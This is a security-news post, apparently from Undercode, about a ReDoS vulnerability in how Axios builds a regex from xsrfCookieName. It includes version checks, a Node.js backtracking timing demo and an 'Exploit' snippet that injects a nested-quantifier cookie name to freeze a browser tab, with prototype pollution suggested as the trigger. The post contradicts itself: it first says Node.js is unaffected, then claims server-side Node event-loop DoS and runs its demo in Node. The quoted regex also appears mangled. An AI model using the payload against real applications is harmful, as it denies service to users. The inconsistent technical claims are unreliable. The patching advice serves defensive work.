Listen to this Post
Intro
The vulnerability arises from how Axios constructs a regular expression to parse the browser’s `document.cookie` when reading a specific cookie. In affected versions, the cookie name (e.g., from the `xsrfCookieName` configuration) is directly concatenated into a regex pattern without escaping special characters.
When a request is made in a browser, Axios automatically looks for an XSRF token in cookies. To do this, it creates a regex like: new RegExp('(?:^|; )' + name + '=([^;])'). Because the `name` is not escaped, an attacker who can control the value of `xsrfCookieName` can inject regex metacharacters. A specially crafted name such as `(.+)+$` or `(([^;])+)+\\$` creates “nested quantifiers” (multiple `+` or “ operators inside each other).
When the regex engine tries to match this pattern against the cookie string, it causes “catastrophic backtracking” – an exponential explosion of possible matching paths. Even a moderate-length cookie string (approx. 20–30 characters) can force the engine to consume millions of operations, freezing the browser tab for seconds or minutes. The impact is pure Denial of Service (availability), with no data leakage or request modification. It only affects standard browser environments where Axios reads document.cookie; Node.js, React Native, and web workers are not impacted. The vulnerability was fixed by removing dynamic regex construction entirely, replacing it with simple string splitting and equality comparison.
DailyCVE Form:
Platform: Web browser client
Version: Axios 0.x/1.x
Vulnerability: ReDoS via XSRF
Severity: High (7.5)
Date: June 4, 2026
Prediction: Patch already released
What Undercode Say (Analytics & Commands)
Check installed Axios version
npm list axios
Verify vulnerable pattern in node_modules
grep -r "new RegExp('(?:^|; )' + name" node_modules/axios/lib/helpers/cookies.js
Simulate exponential backtracking (Node.js)
node -e "
function vulnerableRead(name, cookie) {
const start = Date.now();
try {
cookie.match(new RegExp('(?:^|; )' + name + '=([^;])'));
} catch(e) {}
return Date.now() - start;
}
for (let n of [20,22,24,26,28]) {
let cookie = 'x=' + 'a'.repeat(n) + '!';
console.log(`Length \${n}: \${vulnerableRead('(.+)+$', cookie)}ms`);
}
"
Example output:
Length 20: 21ms Length 22: 84ms Length 24: 336ms Length 26: 1344ms Length 28: ~5376ms
Analysis: Each additional 2 characters roughly quadruples execution time, confirming exponential backtracking.
Exploit:
// Exploit: Force freeze browser tab by setting malicious xsrfCookieName
// Requires attacker control over Axios config (e.g., via prototype pollution or direct injection)
const evilName = '(([^;])+)+X' + 'X'.repeat(25); // 25+ chars triggers ~1300ms freeze
axios.defaults.xsrfCookieName = evilName; // Inject payload
axios.get('/api/data'); // Next request freezes tab
Real-world trigger: An attacker pollutes `Object.prototype` with xsrfCookieName: '(.+)+$'. Any subsequent Axios request in the victim’s browser will freeze the tab.
Protection:
- Update Axios to `>=0.32.0` (0.x) or `>=1.16.0` (1.x).
- Workaround: Set `xsrfCookieName: null` in all Axios instances.
- Sanitize input: Never derive `xsrfCookieName` from untrusted data. If dynamic, validate against a strict allowlist.
- Avoid unsafe internal calls: Never call `axios/unsafe/helpers/cookies.js` directly with user input.
Impact:
- Client-side DoS: Freezes browser tab, blocking UI and JavaScript execution.
- Server-side DoS (SSR): Blocks Node.js event loop, making server unresponsive.
- Event loop starvation: Pauses all async operations, timers, and I/O for duration of regex evaluation.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
